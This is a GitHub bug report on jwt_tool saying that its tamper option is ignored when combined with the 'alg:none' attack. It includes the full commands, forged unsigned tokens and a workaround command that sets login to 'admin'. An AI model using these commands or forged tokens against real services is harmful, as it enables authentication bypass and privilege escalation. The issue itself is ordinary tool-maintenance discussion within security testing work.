Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

tempering is ignored when combined with an attack #84

Open
noraj opened this issue Oct 8, 2022 · 1 comment
Open

tempering is ignored when combined with an attack #84

noraj opened this issue Oct 8, 2022 · 1 comment

Comments

@noraj
Copy link

noraj commented Oct 8, 2022

When combining temper + an attack, the output token is the original token + the attack, the tempering is ignored.

For example:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -T -X a

...

Token payload values:
[1] login = "noraj"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of login is: noraj
Please enter new value and hit ENTER
> admin 
[1] login = "admin"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_5f095c12269a0436e321cc1cff90399b - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e67565a408b902fbaee7f0551345ceec - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_09935cb7b6cadff540561326dd3688d1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e8a178e70ccfaab8ad7ff0ae90add944 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.

The outputed token contains user noraj and not admin.
@noraj
Copy link
Author

noraj commented Oct 8, 2022

I know I can use this:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -X a -pc login -pv admin -I

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@noraj